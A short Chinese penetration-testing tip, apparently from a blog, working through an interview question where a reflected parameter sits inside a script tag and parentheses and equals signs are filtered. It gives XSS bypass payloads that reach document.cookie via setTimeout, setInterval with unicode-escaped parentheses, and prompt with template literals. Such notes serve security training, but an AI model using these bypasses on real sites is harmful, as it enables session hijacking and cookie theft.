别人的一个安全面试题,简单记录一下。

参数name直接已经放在了<script>标签里面:

渗透Tips之XSS过滤括号等号情况下cookie的获取

那么直接alert(document.cookie)试一下:

渗透Tips之XSS过滤括号等号情况下cookie的获取

可以看到括号已经做了处理,虽然可以使用反引号绕过括号过滤,但是反引号中的内容是处理字符串,并不能得到想要的结果,比如:

渗透Tips之XSS过滤括号等号情况下cookie的获取

通过FUZZ,如下:

TIPS:

setTimeout`alert\u0028document.cookie\u0029`;
setInterval`alert\u0028document.cookie\u0029`;

  

渗透Tips之XSS过滤括号等号情况下cookie的获取

 

如果setTimeou可以,那么setInterval也可以使用,区别就是后者会根据设置的时间不断执行:

渗透Tips之XSS过滤括号等号情况下cookie的获取

Tips:

prompt`${document.cookie}`

  

渗透Tips之XSS过滤括号等号情况下cookie的获取

当然还有其他方法,仅作为tips参考。

 

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2021-12-23
  • 2022-12-23
  • 2021-10-17
  • 2022-01-14
  • 2021-11-26
  • 2021-06-28
猜你喜欢
  • 2022-12-23
  • 2021-12-30
  • 2021-10-14
  • 2022-12-23
  • 2021-12-29
  • 2022-03-09
  • 2021-12-26
相关资源
相似解决方案